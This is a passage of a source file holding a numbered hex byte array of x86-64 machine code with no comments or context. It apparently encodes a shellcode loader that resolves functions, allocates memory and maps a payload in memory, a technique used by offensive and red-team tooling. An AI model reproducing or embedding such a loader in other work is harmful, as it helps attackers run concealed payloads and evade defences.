10 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x21,
11 0x15, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48, 0x83,
12 0xbd, 0x98, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00,
13 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
14 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00,
15 0x4c, 0x8b, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x05, 0xfc, 0x00,
16 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00,
17 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
18 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
19 0x89, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
20 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00,
21 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xc0, 0x04, 0x00,
22 0x00, 0xe8, 0x9a, 0x14, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
23 0x00, 0x48, 0x83, 0xbd, 0x88, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8b,
24 0x00, 0x00, 0x00, 0xeb, 0x0c, 0x48, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff,
25 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x80, 0x04, 0x00, 0x00,
26 0x00, 0x74, 0x73, 0x48, 0x83, 0xbd, 0x90, 0x04, 0x00, 0x00, 0x00, 0x74,
27 0x69, 0xc7, 0x45, 0xe0, 0x0b, 0x00, 0x10, 0x00, 0x48, 0x8b, 0x85, 0x90,
28 0x04, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8d, 0x45, 0xb0,
29 0x4c, 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x41, 0xff,
30 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08,
31 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b,
32 0x45, 0x48, 0x48, 0x83, 0xe0, 0xf0, 0x48, 0x89, 0x45, 0x48, 0x48, 0x8d,
33 0x45, 0xb0, 0x4c, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0xba, 0x00, 0x00,
34 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xeb, 0x0c, 0x48, 0x8b,
35 0x8d, 0xc0, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8b,
36 0x85, 0xa8, 0x04, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x30, 0x05, 0x00, 0x00,
37 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8d,
38 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xa0, 0x01, 0x00,
39 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
40 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
41 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01, 0x00,
42 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
43 0x00, 0x00, 0xe8, 0x9d, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x60, 0x01,
44 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40,
45 0x50, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
46 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48, 0x8b, 0x85, 0x68, 0x01,
47 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
48 0x01, 0x00, 0x00, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x48, 0x89, 0x85, 0x58,
49 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b,
50 0x80, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
51 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28, 0x48,
52 0x8b, 0x85, 0x68, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2,
53 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0x20, 0x13, 0x00, 0x00,
54 0x48, 0x89, 0x85, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x01,
55 0x00, 0x00, 0x00, 0x74, 0x14, 0x48, 0x83, 0xbd, 0x58, 0x01, 0x00, 0x00,
56 0x00, 0x74, 0x0a, 0x48, 0x83, 0xbd, 0x50, 0x01, 0x00, 0x00, 0x00, 0x75,
57 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xa1, 0x08, 0x00, 0x00, 0x48,
58 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
59 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41,
60 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0,
61 0x48, 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x48, 0x01,
62 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
63 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x0e, 0x48,
64 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
65 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x41, 0x08, 0x00, 0x00, 0x48,
66 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x48,
67 0x01, 0x00, 0x00, 0x41, 0x89, 0xd0, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00,
68 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xb3, 0x61, 0x00, 0x00, 0x48, 0x8b, 0x85,
69 0x48, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
70 0x8d, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
71 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0x61, 0x00,
72 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x02,
73 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x92, 0x00, 0x00, 0x00, 0x48,
74 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x10, 0x02, 0x00, 0x00,
75 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
76 0x00, 0x00, 0x8b, 0x00, 0x44, 0x8d, 0x80, 0xf0, 0xfd, 0xff, 0xff, 0x48,
77 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b,
78 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x8d,
79 0x40, 0x01, 0x00, 0x00, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
80 0xc1, 0xe8, 0x2e, 0x6e, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
81 0x00, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
82 0x48, 0x8d, 0x8a, 0x00, 0x0c, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xee,
83 0x6a, 0x00, 0x00, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x8b,
84 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x0d, 0x00, 0x00,
85 0x48, 0x39, 0x85, 0x38, 0x01, 0x00, 0x00, 0x0f, 0x85, 0xe6, 0x05, 0x00,
86 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x50, 0x28,
87 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x49,
88 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
89 0xe8, 0x77, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x01, 0x00, 0x00,
90 0x48, 0x89, 0x42, 0x30, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
91 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
92 0xff, 0xe9, 0x02, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
93 0x00, 0x48, 0x05, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x85, 0x78, 0x01,
94 0x00, 0x00, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
95 0xeb, 0x24, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
96 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0x8c,
97 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x85, 0x8c, 0x01, 0x00,
98 0x00, 0x01, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
99 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
100 0x23, 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01,
101 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x0c,
102 0x81, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x03, 0x01, 0x00, 0x00, 0x76, 0xa2,
103 0x83, 0xbd, 0x8c, 0x01, 0x00, 0x00, 0x00, 0x74, 0x35, 0x8b, 0x85, 0x8c,
104 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x78,
105 0x01, 0x00, 0x00, 0x8b, 0x85, 0x8c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
106 0xd0, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
107 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xa5, 0x0a, 0x00, 0x00, 0xe9, 0x58, 0xff,
108 0xff, 0xff, 0x90, 0xc7, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00,
109 0x00, 0xe9, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
110 0x00, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
111 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
112 0x04, 0xd0, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0,
113 0x01, 0x00, 0x00, 0xe8, 0x54, 0x10, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0,
114 0x01, 0x00, 0x00, 0x8b, 0x8d, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc1,
115 0x06, 0x48, 0x89, 0x04, 0xca, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
116 0x8b, 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b,
117 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x75, 0x38, 0x48, 0x8b, 0x85, 0xa0, 0x01,
118 0x00, 0x00, 0x48, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
119 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
120 0x95, 0x8c, 0x01, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04,
121 0xd0, 0x48, 0x39, 0x85, 0x68, 0x01, 0x00, 0x00, 0x0f, 0x85, 0x38, 0x04,
122 0x00, 0x00, 0x90, 0x83, 0x85, 0x8c, 0x01, 0x00, 0x00, 0x01, 0x48, 0x8b,
123 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
124 0x85, 0x8c, 0x01, 0x00, 0x00, 0x0f, 0x82, 0x47, 0xff, 0xff, 0xff, 0x48,
125 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00,
126 0x83, 0xf8, 0x02, 0x75, 0x2b, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
127 0xe8, 0x52, 0x10, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xf4, 0x03, 0x00,
128 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30,
129 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x3c,
130 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00,
131 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0xca, 0x03, 0x00, 0x00, 0x48, 0x8b,
132 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
133 0xf8, 0x01, 0x75, 0x14, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
134 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
135 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
136 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xba, 0xa4, 0x0f, 0x00, 0x00,
137 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x70, 0x01,
138 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
139 0xa0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x90, 0xf8, 0x01, 0x00, 0x00, 0x48,
140 0x83, 0xbd, 0x70, 0x01, 0x00, 0x00, 0x00, 0x75, 0x2a, 0x48, 0x8b, 0x85,
141 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
142 0x02, 0x75, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00, 0xb9, 0x00,
143 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x95,
144 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
145 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x93, 0x00, 0x00,
146 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc4, 0x56, 0x00,
147 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01, 0x00,
148 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b,
149 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xf1, 0x02,
150 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xdd, 0x58,
151 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34, 0x01,
152 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
153 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0xc3,
154 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xbb,
155 0x58, 0x00, 0x00, 0x89, 0x85, 0x34, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x34,
156 0x01, 0x00, 0x00, 0x00, 0x75, 0x16, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
157 0x00, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
158 0x95, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b,
159 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x8d, 0x01, 0x00, 0x00, 0x48,
160 0xc7, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
161 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x89,
162 0xc0, 0x48, 0x05, 0x2f, 0x15, 0x00, 0x00, 0x48, 0x25, 0x00, 0xf0, 0xff,
163 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8d, 0x4d, 0xc8, 0x48, 0x8d, 0x85,
164 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48,
165 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00,
166 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41,
167 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff,
168 0xff, 0xff, 0xff, 0xe8, 0x1b, 0x65, 0x00, 0x00, 0x89, 0x85, 0x30, 0x01,
169 0x00, 0x00, 0x83, 0xbd, 0x30, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x09,
170 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
171 0x95, 0x80, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x30, 0x05, 0x00, 0x00, 0x48,
172 0x89, 0xc1, 0xe8, 0xd5, 0x5c, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
173 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x13, 0x48, 0x8b,
174 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f,
175 0x85, 0x93, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00,
176 0x4c, 0x8b, 0x90, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
177 0x00, 0x00, 0x8b, 0x88, 0x20, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80,
178 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x88, 0x28, 0x05, 0x00, 0x00, 0x48, 0x8b,
179 0x85, 0x80, 0x01, 0x00, 0x00, 0x44, 0x8b, 0x98, 0x24, 0x05, 0x00, 0x00,
180 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05,
181 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08,
182 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x4c, 0x8d, 0x85,
183 0x24, 0x01, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x89, 0x4c, 0x24,
184 0x20, 0x45, 0x89, 0xd8, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85, 0x2c,
185 0x01, 0x00, 0x00, 0x83, 0xbd, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85,
186 0x4b, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
187 0x89, 0x85, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x40, 0x48, 0x8b, 0x85, 0x80,
188 0x01, 0x00, 0x00, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x31, 0x48,
189 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x28, 0x05, 0x00,
190 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
191 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xe0, 0x58, 0x00, 0x00, 0x48, 0x8b,
192 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x01, 0x00, 0x00,
193 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03,
194 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83,
195 0xf8, 0x04, 0x75, 0x1b, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
196 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xf5, 0x24,
197 0x00, 0x00, 0xe9, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01,
198 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0e, 0x48, 0x8b, 0x85,
199 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x5c, 0x48,
200 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
201 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
202 0x00, 0x00, 0xe8, 0x87, 0x15, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x20, 0x48,
203 0x8d, 0x95, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00,
204 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01,
205 0x00, 0x00, 0xe8, 0xe8, 0x1a, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x00,
206 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00,
207 0xe8, 0x5d, 0x22, 0x00, 0x00, 0xeb, 0x50, 0x48, 0x8b, 0x85, 0x80, 0x01,
208 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0e, 0x48, 0x8b, 0x85,
209 0x80, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x33, 0x48,
210 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
211 0xa0, 0x01, 0x00, 0x00, 0xe8, 0xc3, 0x40, 0x00, 0x00, 0xeb, 0x1c, 0x90,
212 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90,
213 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90,
214 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80,
215 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74, 0x16, 0x48, 0x8b, 0x85,
216 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
217 0x03, 0x0f, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
218 0x00, 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0,
219 0x74, 0x7d, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
220 0x28, 0x0d, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00,
221 0x00, 0x48, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x41, 0x89, 0xd0, 0xba,
222 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x34, 0x5a, 0x00, 0x00,
223 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0,
224 0x01, 0x00, 0x00, 0x48, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x4d,
225 0xc8, 0x48, 0x8b, 0x95, 0x70, 0x01, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
226 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
227 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x7e, 0x62, 0x00,
228 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x30,
229 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01,
230 0x00, 0x00, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f,
231 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48,
232 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x41, 0x89, 0xc0, 0xba,
233 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xe8,
234 0xac, 0x59, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48,
235 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x85,
236 0x58, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00,
237 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
238 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
239 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xbd, 0x28, 0x01,
